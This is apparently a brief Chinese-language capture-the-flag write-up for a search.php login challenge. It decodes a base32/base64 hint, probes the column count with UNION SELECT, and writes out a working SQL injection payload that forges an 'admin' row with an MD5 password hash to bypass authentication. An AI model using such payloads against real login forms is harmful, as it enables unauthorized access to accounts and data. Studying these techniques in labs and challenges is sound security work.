看search.php
发现了一串base,先base32 再base64
然后我们还是像之前一样,确定一下列数:
name=1' union select 1,2,3,4 %23 &pw=123
这样的话就报错了,然后再把4删掉,成功显示,这便确定了是3列
name=1' union select 1,2,3 %23 &pw=123
如果查询的数据不存在的时候,union查询就会构造一个虚拟的数据。sql的password会md5加密,然后我们将我们自己输的密码编码成md5然后放入第三列当中,123加密成md5是
202cb962ac59075b964b07152d234b70
构造最终的pyload为
name=1' union select 1,'admin','202cb962ac59075b964b07152d234b70' %23 &pw=123
